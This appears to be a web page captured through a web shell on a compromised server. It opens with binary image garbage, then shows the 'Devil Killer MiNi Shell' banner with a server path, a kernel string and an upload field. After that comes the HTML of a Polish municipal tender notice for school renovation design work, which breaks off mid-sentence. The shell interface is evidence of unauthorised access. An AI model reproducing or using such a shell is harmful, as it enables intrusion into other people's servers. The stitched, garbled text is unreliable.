JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230904/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230904/0038051601-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Opracowanie dokumentacji projektowej modernizacji I piętra budynku Szkoły Podstawowej nr 2 w Czarnej Białostockiej. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Czarna Białostocka</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 050659036</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Torowa 14 A</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Czarna Białostocka</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">16-020</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podlaskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL841 - Białostocki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">857131340</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">um@czarnabialostocka.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://bip-umczarnabialostocka.wrotapodlasia.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Opracowanie dokumentacji projektowej modernizacji I piętra budynku Szkoły Podstawowej nr 2 w Czarnej Białostockiej. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-fd6f5229-4b1d-11ee-a60c-9ec5599dddc1</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00380516</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-09-04</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00026787/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.5 Opracowanie dokumentacji projektowej modernizacji I piętra budynku Szkoły Podstawowej Nr 2 w Czarnej Białostockiej</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-fd6f5229-4b1d-11ee-a60c-9ec5599dddc1 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu Platformy e-Zamówienia, która jest dostępna pod adresem https://ezamowienia.gov.pl oraz poczty elektronicznej przetargi@czarnabialostocka.pl . Adres strony internetowej, na której będą udostępniane zmiany i wyjaśnienia SWZ oraz inne dokumenty zamówienia bezpośrednio związane z postępowaniem o udzielenie zamówienia: https://bip-<br/>um.czarnabialostocka.wrotapodlasia.pl w zakładce „Zamówienia publiczne</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu Platformy e-Zamówienia, która dostępna jest pod adresem: https://ezamowienia.gov.pl/ (dotyczy składania ofert), oraz pocz elektr: przetargi@czarnabialostocka.pl .<br/>2.Oferty/wnioski o dopuszczenie do udziału w postęp, zawiadomienia, wezwania, zadawanie pytań oraz ogólne informacje, Zamawiający i Wykonawcy przekazują powołując się nr ogłoszenia (BZP) lub nr refer postęp tj. Or.271.19.2023. 3. Wykonawca zamierzający wziąć udział w postęp o udzielenie zamów publicz, musi posiadać konto podmiotu „Wykonawca” na P. e-Zamówienia. Wykonawca posiadający konto na P. e-Zamówienia ma dostęp do formu: złożenia, zmiany, wycofania oferty lub wniosku oraz do<br/>formularza do komun. 4. Możliwość korzystania w postęp z „Formularzy do komunikacji” w pełnym zakresie wymaga posiadania konta „Wykonawcy” na P. e- Zamówienia oraz zalogowania się na P. e-Zamówienia. Do korzystania z „Formularza do komunikacji” służących do zadawania pytań dotyczących treści dokum zamów wystarczające jest posiadanie tzw. konta uproszczonego na P. e- Zamówieniach. Zamawiający wymaga aby komuni między zamawiającym a wykonawcami, w tym wszelkie oświad, wnioski,<br/>zawiadomienia oraz inform, przekazywane były w formie elektro. 5. Zamawiający nie ponosi odpowiedzialności za złożenie oferty w<br/>sposób niezgodny z SWZ. 6. Wymagania techn i organizacyjne wysyłania i odbierania dokum elektron, elektron kopii dokum i oświadczeń oraz inform przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z P. e-Zamówień. 7. Zamawiający przekazuje link do postęp oraz ID postępo jako inform do niniejszej SWZ. Dane postępow można wyszukać również ze<br/>strony głównej P. e-Zamówienia (przycisk „Przeglądaj postępowanie/konkurs”). 8. Za datę i godz przekazania oferty, wniosków,<br/>zawiadomień, dokum elektron, oświad lub elektron kopii dokum lub oświad oraz innych inform przyjmuje się datę ich przekazania na P. e-Zamówienia https://ezamowienia.gov.pl lub datę ich przekazania za pomocą pocz elektron z zastrzeżeniem, iż ofertę wraz z załącz określonymi w roz X. SWZ, pod rygorem odrzucenia oferty na podst art 226 ust.1 pkt6 Pzp, można przekazać wyłącznie na P. e-Zamówienia https://ezamowienia.gov.pl Dokum składane w formie elektron lub w postaci elektron muszą być opatrzone podp<br/>elektron, podp zaufanym lub podp osob (zgodnie z art. 63 ust. 2 Pzp). Ofertę, oświadczenia o których mowa w art.125 ust.1 Pzp., pśd, pełnomocnictwa sporządza się w postaci elektr, w ogólnie dostępnych formatach danych, w szczególności w formatach .txt,.rtf,.pdf,.doc,.docx,.odt. Zalecany przez Zamawiającego format danych - .pdf. 9. Komuni w postęp, z wyłączeniem składania ofert/wniosków o dopuszczenie do udziału w postępowaniu, odbywa się drogą elektro za pośrednictwem “Formularze” („Formularze<br/>do komunikacji”). Za pośred „Formularzy do komunikacji” odbywa się w szczególności przekazywanie wezwań i zawiadomień, zadawanie pytań i udzielanie odpowiedzi. Formularze do komun umożliwiają również dołączenie załączn do przesyłania wiadomoś (przycisk „dodaj załącznik”). W przypadku załącz zamawiający dopuszcza również możliwość składania doku elektr za pomocą poczty elektr, na wskazany w pkt. 1 adres e-mail. Sposób sporządzania dok elektr musi być zgodny z wymaganiami określonymi w<br/>rozp MRPiT z dn 23.12.2020 r. w sprawie pśd oraz innych dokum lub oświad, jakich może żądać zamawiający od wykonawcy oraz rozp PRM z dn 30.12.2020 r. w sprawie sposobu sporządz i przekazyw inform oraz wymagań tech dla dokum elektro oraz środ komu elektron w postęp o udzielenie zamó publi lub konkursie. W zależności od rodzaju podpisu i jego typu (zewn i wewn) dodaje się do przesłanej wiadomości uprzednio podpisane dokum wraz z wygenerowanym plikiem podp (typ zewn) lub dokum z wszytym podp<br/>(typ wewnętrzny). Wszystkie wysłane i odebrane w postępo przez wykonawcę wiadomości widoczne są po zalogowaniu w podglądzie postępowania w zakładce Komunikacja</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 roz Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27.04.2016 r. w sprochrony osób fiz w związku z przetwarzaniem dan osob i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne roz. o ochronie da¬nych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „Roz”, informuję, że:<br/>1.Admin Pani/Pana dan oso jest Gmina Cz B reprezentowana przez Burmistrza Cz B z siedzibą: ul. Torowa 14A, 16-020 Cz B, tel.: 85 713 13 40, e-mail: um@czarnabialostocka.pl. 2.W sprawach z zakresu ochrony dan oso może się Pan/i kontaktować się z IOD pod adresem e-mail: iod@dbajodane.pl 3.Dane osobowe będą przetwarzane w celu związanym z postęp o udzielenie zp. 4.Dane osob będą przechowywane przez okres zg. z art. 78 ust. 1 i 4 ust. z dnia z dnia 11.09.2019 r.– Pzp (Dz. U. z 2022 r. poz. 1710 z późn. zm.)zwanej dalej PZP, przez okres 4 lat od dnia zak postępowania o udzielenie zam, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas obowiązywania umowy. 5.Podstawą prawną przetwarzania danych jest art. 6 ust. 1 lit. c) ww. Roz w związku z przepisami PZP. 6.Odbiorcami Pan/i danych będą osoby lub podmioty, którym udostępniona zostanie dok<br/>postępowania w oparciu o art. 18 oraz art. 74 ust. 4 PZP. 7.Ob podania przez Pan/i danych osobowych bezpośrednio Pan/i<br/>dotyczących jest wymogiem ust określonym w przepisach PZP, związanym z udziałem w post o udzielenie zam publ; konsekwencje<br/>niepodania określonych danych wynikają z PZP. 8.Osoba, której dane dotyczą ma prawo do: dostępu do treści swoich danych oraz<br/>możliwości ich poprawiania, sprostowania, ograniczenia przetwarzania,w przypadku gdy przetw danych odbywa się z naruszeniem<br/>przep Roz służy prawo wniesienia skargi do organu nadzorczego tj. Prezesa UODO, ul. Stawki 2, 00-193 Wawa,9.Osobie, której<br/>dane dotyczą nie przysługuje: w związku z art. 17 ust. 3 lit. b, d lub e Roz prawo do usunięcia dan osob; prawo do przenoszenia dan<br/>osob, o którym mowa w art. 20 Roz;na podstawie art. 21 Roz prawo sprzeciwu, wobec przetwarzania dan osob. 10.W przypadku gdy<br/>wykonanie obow, o których mowa w art. 15 ust. 1-3 Roz, wymagałoby niewspółmiernie dużego wysiłku, Admin może żądać od<br/>osoby, której dane dotyczą, wskazania dodat inf mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty<br/>postępowania o udzielenie zam publ. 11.Skorzystanie przez osobę, której dane dotyczą, z uprawnienia do sprostowania lub<br/>uzupełnienia dan oso, o którym mowa w art. 16 Roz, nie może skutkować zmianą wyniku postę o udzielenie zam publ lub konkursu<br/>ani zmianą post. umowy w zakresie niezgodnym z PZP. 12.Wystąpienie z żądaniem, o którym mowa w art. 18 ust. 1 Roz, nie ogranicza przetwarzania dan osobowych do czasu zakończenia postępowania o udzielenie zam publ.<br/>13.W przypadku dan osob zamieszczonych przez Admin w BZP, prawa, o których mowa w art. 15 i art. 16 Roz, są wykonywane w<br/>drodze żądania skierowanego do Admin.14. Od dnia zakończenia postępowania o udzielenie zam, w przypadku gdy wniesienie<br/>żądania, o którym mowa w art. 18 ust. 1 Roz, spowoduje ograniczenie przetwarzania dan osob zawartych w protok i załą do protok,<br/>Admin nie udostępnia tych danych zawartych w protok i w zał do protok, chyba że zachodzą przesłanki, o których mowa w art. 18<br/>ust. 2 Roz. 15.W przypadku gdy wykonanie obowiązków, o których mowa w art. 15 ust. 1-3 Roz, wymagałoby niewspółmiernie dużego wysiłku, Admin może żądać od osoby, której dane dotyczą, wskazania dodatkowych inf mających w szczególności na celu sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie zam. 16.Skorzystanie przez osobę, której dane dotyczą, z uprawnienia do sprostowania lub uzup, o którym mowa w art. 16 Roz, nie może naruszać integralności protok oraz jego zał.<br/>17.Ponadto informujemy, iż w związku z przetwarzaniem Pan/i danych osobowych nie podlega Pan/i decyzjom, które się opierają<br/>wyłącznie na zautomatyzowanym przetwarzaniu, w tym profilowaniu, o czym stanowi art. 22 Roz</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">Or.271.19.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Szczegółowy opis przedmiotu zamówienia, warunki i sposób jego realizacji:<br/>W ramach zadania należy opracować kompleksową, wielobranżową dokumentację projektową w zakresie modernizacji I piętra budynku Szkoły Podstawowej nr 2 w Czarnej Białostockiej.<br/>Ww. dokumentacja projektowa ma obejmować elementy branży budowlanej (m.in. ściany, sufity, posadzki, poszerzenia otworów drzwiowych, nową stolarkę drzwiową, sanitarnej (przeróbki instalacji wod-kan. oraz wentylacji), elektrycznej (zasilania i oświetlenia) oraz niskoprądowej.<br/>I. Zamawiana dokumentacja winna obejmować: <br/>Wykonawca opracuje:<br/>1. Projekty budowlane:<br/>- projekt architektoniczny – 4 egz.,<br/>- projekt konstrukcyjny (o ile zajdzie konieczność) – 4 egz.,<br/>2. Projekty wykonawcze:<br/>- projekt architektoniczny budowlano-wykonawczy obejmujący co najmniej rzuty kondygnacji i przekroje, wykazy stolarki, ślusarki, wykończenia wraz z kolorystyką wewnętrzną – 3 egz.,<br/>- projekt instalacji elektrycznej wewnętrznej wraz z rozdzielnią elektryczną kondygnacji (o ile zajdzie konieczność) - 3 egz.,<br/>- projekt wewnętrznej instalacji wod.-kan. (o ile zajdzie konieczność) – 3 egz.,<br/>- projekt wewnętrznej instalacji c.o. (o ile zajdzie konieczność) – 3 egz.,<br/>3. Ponad to należy opracować:<br/>- informację dotyczącą bezpieczeństwa i ochrony zdrowia zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 23 czerwca 2003r. w sprawie informacji dotyczącej bezpieczeństwa i ochrony zdrowia oraz planu bezpieczeństwa i ochrony zdrowia – 2 egz.;<br/>- specyfikację techniczną wykonania i odbioru robót zawierającą zbiory wymagań <br/>w zakresie sposobu wykonania robót budowlanych, obejmującą w szczególności wymagania w zakresie właściwości materiałów, sposobu wykonania i prawidłowości wykonania poszczególnych robót zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego – 2 egz.;<br/>- przedmiary robót i kosztorysy inwestorskie do wyżej wymienionych projektów w oparciu o KNNR zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego oraz kosztorysy inwestorskie każdej branży – po 2 egz. wraz z wersja elektroniczną zapisaną w rozszerzeniu ath oraz PDF na nośniku w postaci płyty CD lub dysku USB, <br/>- wszystkie opracowania projektowe i STWiOR mają być przekazane Zamawiającemu również w wersji elektronicznej zapisane w PDF na nośniku w postaci płyty CD lub dysku USB.<br/>Zamawiający dołącza PDF rzutu I kondygnacji objętej zapytaniem.<br/>4. Zamówieniem objęty jest również nadzór autorski na etapie realizacji robót. Czynności nadzoru autorskiego prowadzone będą wyłącznie na wezwanie Zamawiającego, a ich wykonanie każdorazowo będzie potwierdzane przez Zamawiającego oraz jednokrotna aktualizacja kosztorysu autorskiego. <br/>5. Do obowiązków wykonawcy należą również wszelkie prace przygotowawcze i pomocnicze związane z prawidłowym opracowaniem projektu, w tym: <br/>1) współpraca z Zamawiającym lub wskazanymi osobami na etapie opracowywania dokumentów dla instytucji finansujących; <br/>2) udzielanie wyjaśnień co do treści projektu w postępowaniu przetargowym na wybór wykonawcy robót, <br/>3) przed przystąpieniem do sporządzenia właściwego projektu, Projektant jest zobowiązany przedłożyć Zamawiającemu do zatwierdzenia koncepcję projektową - projekt wstępny i uzyskać akceptację Zarządcy obiektu oraz Zamawiającego; <br/>4) Projektant zobowiązany jest do zorganizowania minimum dwóch spotkań roboczych z Zarządcą i Zamawiającym na etapie sporządzenia dokumentacji projektowej w celu omówienia przyjętej koncepcji, rozwiązań projektowych i materiałowych, <br/>5) stosowania zasady oszczędnego i racjonalnego wydatkowania środków przy sporządzaniu projektu w szczególności przy wyborze rozwiązań instalacyjnych, materiałów i urządzeń.<br/>II. Warunki do uwzględnienia w projektowaniu: <br/>1) Sposób opracowania projektu - rozdzielnie projekty wykonawcze poszczególnych branż. Nie dopuszcza się łączenia tych projektów w jedno opracowanie. <br/>2) Dokumentacja projektowa winna być opracowana w stanie kompletnym w zakresie poszczególnych branż oraz opinii, uzgodnień i decyzji – zgodnie z obowiązującymi przepisami. <br/>3) Dokumentacja projektowa musi opisywać przedmiot zamówienia w sposób jednoznaczny i wyczerpujący, za pomocą dostatecznie dokładnych, zrozumiałych określeń, uwzględniając wszystkie wymagania techniczne i okoliczności mogące mieć wpływ na sporządzenie oferty przez wykonawcę robót, któremu zamówienie na roboty budowlane zostanie udzielone na podstawie Prawa zamówień publicznych. Zaprojektowane materiały budowlane należy scharakteryzować wyłącznie parametrami technicznymi bez podawania nazw własnych (znaków towarowych).<br/>4) Specyfikacje techniczne wykonania i odbioru robót, kosztorys inwestorski <br/>i przedmiar robót winny posiadać jednolite oznaczenia i wzajemnie zgodne odnośniki. <br/>5) W szczególności należy uwzględnić przepisy : <br/>•	Ustawy z dnia 7 lipca 1994r Prawo budowlane (tekst jednolity Dz. U. z 2013r. poz. 1409 z późn. zm.),<br/>•	Obowiązujących polskich norm przenoszących normy europejskie lub norm innych państw członkowskich Europejskiego Obszaru Gospodarczego przenoszących te normy. W przypadku braku Polskich Norm przenoszących normy europejskie lub norm innych państw członkowskich Europejskiego Obszaru Gospodarczego przenoszących te normy uwzględnia się w kolejności dokumenty odniesienia wymienione w art. 30 ust. 2 i 3 ustawy Prawo zamówień publicznych.<br/>•	Rozporządzenia Ministra Infrastruktury z dnia 12.04.2002r. w sprawie warunków technicznych, jakim powinny odpowiadać budynki i ich usytuowanie (Dz.U. <br/>z 2002r., nr 75, poz.690 z późn. zm.).<br/>•	Rozporządzenia Ministra Infrastruktury z dnia 02 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz.U. poz. 1129 z 2013 r.)<br/>•	Rozporządzenia Ministra Infrastruktury z dnia 18.05.2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym (Dz. U. nr 130 poz. 1389 z późn. zm.)<br/>•	Ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych <br/>III. Założenia do projektowania<br/>1.	Założenia ogólne dla obiektu<br/>Przewidywana modernizacja I pietra budynku Szkoły Podstawowej dotyczy wszystkich pomieszczeń znajdujących się na kondygnacji tj. 6 sal zajęć, biblioteki, pokoju nauczycieli, gabinetu vice Dyrektor, pokoju pedagoga, magazynku sali zajęć,, dwóch zespołów sanitarnych (chłopcy, dziewczynki), korytarza i holu. Istniejąca stolarka okienna oraz instalacja c.o. wraz z grzejnikami pozostaje bez zmian (widoczne piony i gałązki grzejników poddać renowacji). <br/>•	Sale lekcyjne, hole, korytarze – modernizacja posadzek, ścian i sufitów, kompleksowa wymiana stolarki drzwiowej, renowacja parapetów wewnętrznych, kolorystyka i zakres modernizacji czy renowacji uzgodnić z Zarządcą obiektu,<br/>•	Węzły sanitarne – należy zmodernizować istniejące z wymianą wyposażenia (biały montaż), przybory czerpalne, baterie umywalkowe itp.<br/>•	Wyposażenie obiektu – w ramach niniejszego zadania należy również zaprojektować wyposażenie pomieszczeń klasowych i części wspólnych np. w tablice korkowe, relingi, tablice białe których rodzaj i asortyment należy uzgodnić z Zarządca obiektu.<br/>•	Wykończenie obiektu - powinno być dostosowane do funkcji obiektu, odporne na zniszczenia. Użyte materiały powinny cechować się trwałością użytkową i estetyką. W trakcie realizacji projektu należy uzgodnić z Zarządcą obiektu i Zamawiającym materiały wykończeniowe.<br/>2. Założenia ogólne dla branż<br/>•	Branża elektryczna – należy zaprojektować modernizację linii oświetlenia podstawowego z wymianą istniejących linii zasilających oraz źródeł światła na oprawy typu led, awaryjnego i ewakuacyjnego adekwatnie do stosownych wymagać związanych z natężeniem oświetlenia w pomieszczeniach klasowych oraz ogólnych tj. łazienkach, holach i korytarzach.<br/>•	zmodernizować linie sieci niskoprądowej (sieć komputerowa, internet), oraz dzwonków.<br/>•	zmodernizować linie zasilające gniazd wtykowych,<br/>•	Branża sanitarna – należy zaprojektować modernizację z wymianą wyposażenia łazienek i pomieszczeń sanitarnych oraz przyborów sanitarnych w pomieszczeniach klasowych.<br/>•	hydrantową wewnętrzną (wymiana dwóch hydrantów w postaci skrzynek wnękowych z wyposażeniem)<br/>Użyte materiały winny być o dużej trwałości, walorach estetycznych i użytkowych. Dążąc do optymalizacji kosztów inwestycji oraz utrzymania spójnego charakteru obiektu należy stosować przy projektowaniu materiały (lub ich zamienniki) 